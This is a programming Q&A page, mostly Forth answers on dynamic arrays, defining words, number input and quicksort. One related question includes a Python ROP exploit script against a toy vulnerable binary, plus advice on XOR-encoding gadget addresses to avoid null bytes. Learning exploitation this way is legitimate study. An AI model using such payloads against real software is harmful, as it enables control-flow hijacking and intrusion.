How would one go about implementing a vector or dynamic array in Forth?

I need a dynamic array in Forth, but I have no idea how to implement one. I searched online and couldn't find anything either. I'm very new to Forth and just starting to learn it. I think I could use a variable to store the length and allocate more as I go, but I don't know whether this even works, since I am also able to write outside the allocated space of the array.

It depends on what you really need. Below is code to create dynamic arrays of cells, quickly tested in VFX Forth and GForth. There are probably neater and better-optimised versions around.
0 [IF]
dynamic array is an address stored in the dictionary pointing to
a structure stored in allocated memory
0 CELL \ data size in bytes n CELLS
1 CELL \ start of data
...
n CELL \ End of data
[THEN]
\ Take dictionary address and return addresses of the array
: array-size \ a -- n ;
@ @ ;
: array-data \ a -- a' ;
@ CELL + ;
\ **********************************************************
\ **********************************************************
\ Expand the data structure and copy the 'old' data into it.
\ This either expands the data to size or to twice the
\ original size whichever is larger.
\ ALLOCATE THROW and FREE THROW catch & report any memory
\ errors.
\ **********************************************************
: dyn-expand \ size a-dict -- ;
DUP >R
array-size 2* MAX \ new-size = largest of the ix offset
\ or 2 * current size.
DUP CELL + ALLOCATE THROW ( new-size new-addr )
2DUP CELL + SWAP ERASE \ zero the newly allocated memory
R@ array-data OVER CELL + R@ array-size
( size new-addr old-data-a new-data-a old-size )
MOVE \ Shift existing data to the new addr. ( size new-addr )
R@ @ FREE THROW \ Free the old data's memory
TUCK ! \ Store the new size
R> ! ; \ Store the new address in the dictionary
: dynamic-array \ CREATE: count -- ; DOES> ix -- a
\ Creates a dynamic array of count cells in ALLOCATED memory.
CREATE \ count -- ;
CELLS DUP CELL + ALLOCATE THROW ( count addr )
DUP , \ Store the data address in the dictionary
2DUP ! \ Store the data size in the allocated memory
CELL + SWAP ERASE \ Zero the new data region.
DOES> \ ix -- addr-of-ix-cell ;
\ Returns the address of the ix th cell. Expanding the array if required.
( ix a )
SWAP CELLS SWAP 2DUP array-size >= IF \ ix not in allocated range
OVER CELL + OVER dyn-expand \ request room up to and including cell ix
THEN
( ix-cells a ) array-data + ;
: dyn-stats. \ a -- ; Prints base address and array size
." Base data address: " DUP .
." Data size in bytes: " CELL - @ . ;
Quick tests and use:
16 dynamic-array ]test ok
456 0 ]test ! 4560 10 ]test ! ok
CR 0 ]test dyn-stats. ." 0th and 10th Data: " 0 ]test @ . 10 ]test @ . CR
Base data address: 9459864 Data size in bytes: 128 0th and 10th Data: 456 4560
******* ***
ok
1600 16 ]test ! \ This extends the array. ok
CR 0 ]test dyn-stats. ." 0th and 10th Data: " 0 ]test @ . 10 ]test @ . CR
Base data address: 10502952 Data size in bytes: 256 0th and 10th Data: 456 4560
ok ******** Address Changed *** & size changed unchanged!!
." 16th data: " 16 ]test @ . 16th data: 1600 ok
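The growth policy used by the code above (grow to the requested size or to twice the current size, whichever is larger, then copy the old data across) can be sketched in Python. This is only an illustration of the policy, not a translation of the Forth code; the class name DynCells and its methods are made up for the example, and a Python list stands in for the allocated block.

```python
class DynCells:
    """Illustrative growable array of integer cells (hypothetical name)."""

    def __init__(self, count):
        self.cells = [0] * count              # zero-filled, like ERASE

    def _expand(self, needed):
        # New capacity: the larger of the requested size and twice the old size.
        new_cap = max(needed, 2 * len(self.cells))
        new_cells = [0] * new_cap             # fresh zeroed block
        new_cells[:len(self.cells)] = self.cells   # copy the old data across
        self.cells = new_cells                # the old block is dropped

    def store(self, ix, value):
        if ix >= len(self.cells):             # index outside the allocated range
            self._expand(ix + 1)
        self.cells[ix] = value

    def fetch(self, ix):
        if ix >= len(self.cells):
            self._expand(ix + 1)
        return self.cells[ix]


arr = DynCells(16)
arr.store(0, 456)
arr.store(10, 4560)
arr.store(16, 1600)                           # forces growth from 16 to 32 cells
print(len(arr.cells), arr.fetch(0), arr.fetch(10), arr.fetch(16))
```

Doubling keeps the number of reallocations logarithmic in the final size, at the cost of up to half of the block being unused.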

Related

ROP Exploit: Address contains null byte

I'm currently trying to adapt this example of a simple ROP attack to x64.
When compiling the program accordingly:
gcc -O0 -g -static -fno-stack-protector -no-pie -o simple_rop64 ./simple_rop.c
And trying to adjust the used addresses of the functions (using gdb) I have the following problem. The x64 address of, e.g., the lazy() function is at 0x401b9d, which is only three bytes. Thus, struct.pack will add a null-byte.
The python interpreter will therefore throw an error when executing with this error message:
python rop_exploit.py
[...]
os.system("./simple_rop64 \"%s\"" % payload)
TypeError: system() argument 1 must be string without null bytes, not str
Is it even possible to use this function address (which is always three bytes only) for this vulnerable program? Or do I have to adjust it otherwise?
Thanks for any help.
Here is the Python script I adjusted:
import os
import struct
#Find gadgets
#objdump -d simple_rop64 | grep --color -E -A2 "pop +%rbp"
#47c54a: 5d pop %rbp
#47c54b: c3 retq
pop_ret = 0x47c54a # start address of a pop,ret sequence
#objdump -d simple_rop32 | grep --color -A2 8049ca4
#8049ca4: 5f pop %edi
#8049ca5: 5d pop %ebp
#8049ca6: c3 ret
pop_pop_ret = 0x8049ca4 # start address of a pop,pop,ret sequence
lazy = 0x401b9d # objdump -d | grep lazy
food = 0x401bb0 # objdump -d | grep food
feeling_sick = 0x401c0c # objdump -d | grep feeling_sick
#Buffer Overflow
#0x0000000000401d0d <+45>: lea -0x70(%rbp),%rax
payload = "A"*0x70
# Saved RBP register
payload += "BBBBBBBB"
#food(0xdeadbeef) gadget
payload += struct.pack("I", food)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)
#feeling_sick(0xd15ea5e, 0x0badf00d) gadget
payload += struct.pack("I", feeling_sick)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xd15ea5e)
payload += struct.pack("I", 0x0badf00d)
payload += struct.pack("I", lazy)
os.system("./simple_rop64 \"%s\"" % payload)
You can't. What you could do instead is find a gadget that performs some operation and apply the inverse operation in your exploit.
For example, if you find a gadget that does xor eax, 0xFFFFFFFF, you can XOR your address with the same constant (0x401b9d ^ 0xFFFFFFFF = 0xFFBFE462) so that it fills all 4 bytes. Pop this intermediate value into eax and call the gadget so that the intermediate value becomes the address you want. Then jump to it.
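The arithmetic of that encoding can be checked with a few lines of Python. This sketch only verifies the byte values; the xor gadget is the hypothetical one from the example above, and the sketch says nothing about whether such a gadget exists in the binary or about how the upper four bytes of a 64-bit stack slot would be filled.

```python
import struct

lazy = 0x401b9d            # address of lazy() from the question
mask = 0xFFFFFFFF          # constant of the hypothetical xor gadget

# Packed as a 64-bit little-endian value, the raw address contains zero bytes.
raw = struct.pack("<Q", lazy)
print(raw, raw.count(b"\x00"))

# XOR-encode the address so that its four low bytes contain no zero byte.
encoded = lazy ^ mask
packed = struct.pack("<I", encoded)
print(hex(encoded), b"\x00" in packed)

# Applying the same XOR again (what the gadget would do) recovers the address.
decoded = encoded ^ mask
print(hex(decoded))
```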

How do I compile to arbitrary memory and execute it in Forth?

I'm interested in testing some of the limits of Gforth and would like to have it execute arbitrary code that I "hand compile" into allocated memory. Here is my attempt.
100 cells allocate throw constant &mem
\ store at &mem: docol: . EXIT
docol: &mem !
comp' . &mem 1 cells + ! drop \ drop "execution token"
comp' EXIT &mem 2 cells + ! drop
42 \ something to print
&mem execute
Unfortunately this fails with:
in file included from *OS command line*:-1
notes/execute.fs:8: Invalid memory address
&mem >>>execute<<<
Backtrace:
$7EFC61175B28 execute
I have to use comp' instead of ', because it doesn't work for getting the xt of EXIT.
I would have thought this should work, unless Gforth doesn't operate in any way like JonesForth did where docol: starts executing the xt's next to it.
Is this possible in either Gforth or ANS forth in general?
You can execute an arbitrary list of xt, but you have to use your own word to execute this list, by applying execute to each xt from the list.
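As a language-neutral model of that idea, the Python sketch below keeps a list of callables (standing in for execution tokens) and runs them one by one against a shared data stack. The names run_xts, dup and mul are invented for the illustration; in Forth the loop body would apply execute to each stored xt.

```python
def run_xts(xts, stack):
    """Apply each callable in xts to the shared data stack, in order."""
    for xt in xts:
        xt(stack)
    return stack


def dup(stack):
    stack.append(stack[-1])


def mul(stack):
    b = stack.pop()
    a = stack.pop()
    stack.append(a * b)


square = [dup, mul]            # the "hand compiled" list of tokens
result = run_xts(square, [7])
print(result)
```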
By the current standard, a standard program cannot compile arbitrary code into allocated memory. The program may only compile into the code space of the dictionary, and in the frame of the current definition (i.e., that is not yet completed). Compilation can be performed via compile, ( xt -- ) or postpone ( i*x "name" -- j*x ) words. Also the words literal, 2literal, sliteral, fliteral (or their counterparts lit,, 2lit,, slit,, flit,) can be used to compile literals.
In Gforth you can also compile into another dictionary ("section"), which can be allocated using the word extra-section ( size "name" -- ).
10000 extra-section execute-in-my-section
\ execute-in-my-section ( i*x xt -- j*x )
unused cr . \ free space in the default dictionary
[:
unused cr . \ free space in the current section
:noname
postpone .
postpone ;
( xt-new )
unused cr . \ free space after compiling the new definition
;] execute-in-my-section ( xt-new )
\ test
123 swap execute
See also section.fs source, and Sections paper by Anton Ertl, 2016.

Forth: How to create a word that compiles other words until certain delimiter is found?

I use Forth (namely Swapforth) to configure certain hardware via I2C. I have a word:
i2c1-send ( reg-address byte -- )
that writes a byte to the specific internal register of a certain chip.
The initialization sequence is quite long, and therefore implementing it as below is not viable due to memory consumption.
: i2c1-init
$1201 $10 i2c1-send
$2130 $43 i2c1-send
[...]
$0231 $43 i2c1-send
;
I have created an implementation that creates a structure holding the length of the sequence in the first cell and triple bytes in the next cells. (Please note that i2c1-send is just a placeholder allowing you to test it without my hardware).
: i2c1-send ( reg_addr byte -- )
\ It is just a placeholder to show what will be written in HW
swap
." addr=" hex . ." val=" . decimal CR
;
: i2c1: ( "<spaces>name" -- )
create here $326e9 0 ,
does> dup cell+ swap
@ 0 do
dup c@ >r 1+
dup c@ 8 lshift swap 1+
dup c@ rot or r> i2c1-send
1+
loop
drop
;
: i2c1-def ( addr val -- )
c, ( adr )
dup 8 rshift c,
255 and c,
;
: i2c1; ( -- )
\ Make sure that i2c1: was used before
$326e9 <> abort" i2c1; without i2c1:"
dup cell+ here swap - ( first_cell length )
\ Verify that the length is a multiple of 3
3 /mod swap 0<> abort" illegal length - not a multiple of 3"
swap !
;
With the above code you define the initialization list similarly:
i2c1: set1
$1234 $11 i2c1-def
$1521 $18 i2c1-def
[...]
$2313 $10 i2c1-def
i2c1;
But the memory consumption is significantly reduced (by a factor of 2 in the case of the J1B Forth CPU).
However, I dislike the syntax. I'd prefer something that lets me define the initialization list just by numbers, until a certain delimiter is found, like below:
i2c1-x: i2c1-init
$1234 $11
$1521 $18
[...]
$2313 $10
i2c1-x;
I have created the word shown below:
: i2c-delim s" i2c1-x;" ;
: i2c1-x: create here 0 ,
begin
parse-name
2dup i2c-delim compare 0<> while
evaluate \ We store the address later
parse-name
evaluate
c,
\ Now store the address
dup 8 rshift c,
255 and c,
repeat
2drop
dup cell+ here swap - ( first_cell length )
\ Verify that the length is a multiple of 3
3 /mod swap 0<> abort" length not a multiple of 3"
swap !
does> dup cell+ swap
@ 0 do
dup c@ >r 1+
dup c@ 8 lshift swap 1+
dup c@ rot or r> i2c1-send
1+
loop
drop
;
It works perfectly for short definitions:
i2c1-x: set2 $1234 $ac $6543 $78 $9871 $01 $3440 $02 i2c1-x;
But fails for longer ones that use multiple lines:
i2c1-x: set2
$1234 $ac
$6543 $78
$9871 $01
$3440 $02
i2c1-x;
Is it possible to define i2c1-x: so that it handles multiple lines, or do I have to use the solution based on separate i2c1:, i2c1-def and i2c1;?
The REFILL word lets you continue parsing on the following lines.
\ Get the next name (lexeme), possibly from the following lines
\ NB: Use the result of parse-name-sure immediately,
\ since it may be garbled after the next refill
\ (the buffer may be overwritten by the next line).
: parse-name-sure ( -- c-addr u|0 )
begin parse-name dup 0= while refill 0= if exit then 2drop repeat
;
\ Check if the first string equals to the second
: equals ( c-addr2 u2 c-addr1 u1 -- flag )
dup 3 pick <> if 2drop 2drop false exit then
compare 0=
;
It is a common approach to translate the input until some delimiter. A general function to perform this approach:
\ Translate the input till a delimiter
\ using xt as translator for a lexeme
2variable _delimiter
: translate-input-till-with ( i*x c-addr u xt -- j*x )
>r _delimiter 2!
begin parse-name-sure dup while
2dup _delimiter 2@ equals 0= while
r@ execute
repeat then 2drop rdrop
;
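The control flow of this approach (take the next token, move on to the next line when the current one is exhausted, stop at the delimiter) can be modelled in Python as follows. This is a sketch of the idea only: the function name tokens_until is made up, the list of strings stands in for the input source, and advancing to the next list element plays the role of REFILL.

```python
def tokens_until(lines, delimiter):
    """Yield whitespace-separated tokens from successive lines until delimiter."""
    for line in lines:                  # next line: the role REFILL plays in Forth
        for token in line.split():     # next token: the role of PARSE-NAME
            if token == delimiter:
                return
            yield token


source = ["$1234 $ac", "$6543 $78", "", "$9871 $01 i2c1-x; ignored"]
values = [int(t.lstrip("$"), 16) for t in tokens_until(source, "i2c1-x;")]
pairs = list(zip(values[0::2], values[1::2]))
print(pairs)
```

Empty lines are skipped naturally, and anything after the delimiter is left unread.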
It also makes sense to factor out the manipulation of 16-bit units into a library:
[undefined] w@ [if]
\ NB: big-endian variant (the high byte is stored first)
: w! ( x addr -- ) dup 1+ >r >r dup 8 rshift r> c! r> c! ;
: w@ ( addr -- x ) dup c@ 8 lshift swap 1+ c@ or ;
: w, ( x -- ) here 2 allot w! ;
[then]
Also, a function for converting text into a number should live in a library. Using evaluate for that is not hygienic. See the example StoN definition in the "How to enter numbers in Forth" question. A helper for converting "$"-prefixed numbers may already exist in your Forth system.
\ dummy definitions for test only
: s-to-n ( addr u -- x ) evaluate ;
: send-i2c1 ( addr x -- ) ." send: " . . CR ;
The application code:
\ Translate the input numbers till the delimiter into the special format
\ (the code could be simplified using the quotations)
: i2c-delim s" i2c1-x;" ;
: translate-i2c-pair ( c-addr u -- )
s-to-n
parse-name-sure
2dup i2c-delim equals abort" translate-i2c: unexpected delimiter"
s-to-n c, w,
;
: translate-i2c-input ( -- )
i2c-delim ['] translate-i2c-pair translate-input-till-with
;
\ Send data from the special format
: send-i2c1-bulk ( addr u -- )
3 / 0 ?do
dup c@ swap 1+
dup w@ swap 2+ >r send-i2c1 r>
loop drop
;
\ The defining word
: i2c1-x:
create here >r 0 , here >r translate-i2c-input here r> - r> !
does> dup cell+ swap @ send-i2c1-bulk
;
A testcase
i2c1-x: test
1 2
3 4
5
6
i2c1-x;
test

How to enter numbers in Forth

Is there something like input in Basic or scanf("%d") in C in Forth?
Probably it will be something like this:
200 buffer: buf
: input ( -- n ) buf 200 accept
some-magic-filter
buf swap evaluate ;
The problem in the above code is how to define a filter that passes only numbers, and not words, definitions, etc.
The standard specifies only a low level >NUMBER word to interpret integer numbers.
OTOH, using EVALUATE to convert strings into numbers is quick and dirty. Either use it without checks (for trusted input) or do not use it at all. Trying to filter the string before EVALUATE is a bad idea: the filter costs as much as >NUMBER itself and is hard to reuse.
NB: neither >NUMBER nor EVALUATE detects numeric overflow.
In any case, your word to input a single-cell integer can be defined something like:
: accept-number ( -- n )
PAD DUP 80 ACCEPT ( addr u ) StoN ( n )
;
In the case of trusted input you can define StoN like
: StoN ( addr u -- x )
STATE @ ABORT" This naive StoN should not be used in compilation state"
DEPTH 2- >R
EVALUATE
DEPTH 1- R> <> IF -24 THROW THEN
\ check depth to accept the single-cell numbers only
;
Otherwise (in the case of untrusted input) you have two choices: to rely on the specific words of a particular Forth system or to use some (perhaps your own) library.
I use the following lexicon to define StoN:
\ ---
\ The words from Substring Matching library
\ (where length is counted in address units)
: MATCH-HEAD ( a u a-key u-key -- a-right u-right true | a u false )
2 PICK OVER U< IF 2DROP FALSE EXIT THEN
DUP >R
3 PICK R@ COMPARE IF RDROP FALSE EXIT THEN
SWAP R@ + SWAP R> - TRUE
;
\ ---
\ The words from Literals interpreting library
\ (where prefix 'I-' is shortcut for Interpret)
: I-DLIT ( a u -- x x true | a u false )
2DUP S" -" MATCH-HEAD >R
DUP 0= IF NIP RDROP EXIT THEN
0 0 2SWAP >NUMBER NIP IF RDROP 2DROP FALSE EXIT THEN
R> IF DNEGATE THEN 2SWAP 2DROP TRUE
;
: I-LIT ( a u -- x true | a u false )
I-DLIT IF D>S TRUE EXIT THEN FALSE
;
After that StoN can be defined as:
: StoN ( a u -- x ) I-LIT IF EXIT THEN -24 THROW ;
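The conversion rule implemented by these words (an optional leading minus sign, then digits only, with any leftover character making the whole string invalid) can be sketched in Python. The function name s_to_n and the use of ValueError are choices made for this illustration; the Forth version signals failure with -24 THROW instead, and its double-cell intermediate result is not modelled here.

```python
def s_to_n(text, base=10):
    """Convert text to an int, rejecting anything that is not a plain number."""
    digits = "0123456789abcdefghijklmnopqrstuvwxyz"[:base]
    negative = text.startswith("-")
    body = text[1:] if negative else text
    if not body:                        # empty string, or a lone minus sign
        raise ValueError("no digits in %r" % text)
    value = 0
    for ch in body.lower():
        d = digits.find(ch)
        if d < 0:                       # a character that is not a digit in this base
            raise ValueError("not a number: %r" % text)
        value = value * base + d
    return -value if negative else value


print(s_to_n("-42"), s_to_n("ff", 16))
```

Because only digit characters are ever accepted, a word name such as dup is rejected instead of being executed, which is the point of avoiding evaluate for untrusted input.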
The mentioned libraries can be found at GitHub:
Substring matching functions library
Resolvers example (for various lexemes)
Rosetta Code suggests this code snippet, working with GForth 0.6.2, to determine if an input string is numeric:
: is-numeric ( addr len -- )
2dup snumber? ?dup if
0< if
-rot type ." as integer = " .
else
2swap type ." as double = " <# #s #> type
then
else 2dup >float if
type ." as float = " f.
else
type ." isn't numeric in base " base @ dec.
then then ;
I built a BASIC-like #INPUT word for Camel Forth to give BASIC users something more familiar. It takes more than one might think. It starts with $ACCEPT, which can be used like INPUT with a string variable or memory block.
The definition of NUMBER? here is for single ints only but it compiles on GForth. It outputs true if conversion is bad; the reverse of SNUMBER?
DECIMAL
: NUMBER? ( addr len -- n ?) \ ?=0 is good conversion
( -- addr len) \ bad conversion
OVER C@ [CHAR] - = DUP >R \ save flag for later
IF 1 /STRING THEN \ remove minus sign
0 0 2SWAP >NUMBER NIP NIP \ convert the number
R> IF SWAP NEGATE SWAP THEN \ negate if needed
;
: $ACCEPT ( $addr -- ) CR ." ? " DUP 1+ 80 ACCEPT SWAP C! ;
: #INPUT ( variable -- ) \ made to look/work like TI-BASIC
BEGIN
PAD $ACCEPT \ $ACCEPT text into temp buffer PAD
PAD COUNT NUMBER? \ convert the number in PAD
WHILE \ while the conversion is bad do this
CR ." Input error "
CR DROP
REPEAT
SWAP ! ; \ store the number in the variable
\ USAGE: VARIABLE X
\ X #INPUT

Problems with quicksort in Forth for big sorted arrays

I use Quicksort to sort integers that are elements of sets represented by entries on a stack. It works fine except when it has to sort larger sets (about 10,000 elements) that happen to be sorted already.
: adswap \ ad1 ad2 --
over @ over @ swap rot ! swap ! ;
: singlepart \ ad1 ad2 -- ad
tuck 2dup @ locals| p ad | swap \ ad2 ad2 ad1
do i @ p < \ ad2 flag
if ad i adswap ad cell + to ad then cell \ ad2 cell
+loop ad adswap ad ; \ ad
: qsort \ ad1 ad2 -- pointing on first and last cell in array
2dup <
if 2dup singlepart >r
swap r@ cell - recurse
r> cell + swap recurse
else 2drop
then ;
Could it be a return stack overflow? It's virtually impossible for the program to keep track of whether the array is already sorted, so how can the problem be solved?
Yes, a naive Quicksort implementation is known to overflow the return stack in edge cases. The solution is also known: recurse into the smaller part and use a tail call for the other part. This recipe is also described on Wikipedia:
To make sure at most O(log n) space is used, recurse first into the
smaller side of the partition, then use a tail call to recurse into
the other.
Tail call optimization transforms a call into a jump, so it does not use the return stack.
Updated qsort definition:
: qsort \ ad1 ad2 -- pointing on first and last cell in array
begin
2dup < 0= if 2drop exit then
2dup - negate 1 rshift >r \ keep radius (half of the distance)
2dup singlepart 2dup - >r >r \ ( R: radius distance2 ad )
r@ cell - swap r> cell+ swap \ ( d-subarray1 d-subarray2 )
2r> u< if 2swap then recurse \ take smallest subarray first
again \ tail call optimization by hand
;
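The same technique can be sketched in Python, where the effect is easy to observe because the default recursion limit is about 1000 frames. The partition function below uses the last element as the pivot, as singlepart does; the function names and the test size of 3000 elements are choices made for this illustration.

```python
def partition(a, lo, hi):
    """Partition a[lo..hi] around the pivot a[hi]; return the pivot's final index."""
    pivot = a[hi]
    store = lo
    for i in range(lo, hi):
        if a[i] < pivot:
            a[i], a[store] = a[store], a[i]
            store += 1
    a[store], a[hi] = a[hi], a[store]
    return store


def qsort(a, lo, hi):
    """Sort a[lo..hi] in place with recursion depth bounded by O(log n)."""
    while lo < hi:
        p = partition(a, lo, hi)
        if p - lo < hi - p:
            qsort(a, lo, p - 1)         # left part is smaller: recurse into it
            lo = p + 1                  # then loop on the right part
        else:
            qsort(a, p + 1, hi)         # right part is smaller (or equal)
            hi = p - 1                  # then loop on the left part


data = list(range(3000))                # already sorted: worst case for this pivot
qsort(data, 0, len(data) - 1)
print(data == sorted(data))
```

The running time on sorted input is still quadratic with this pivot choice; only the stack depth is fixed by recursing into the smaller part.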
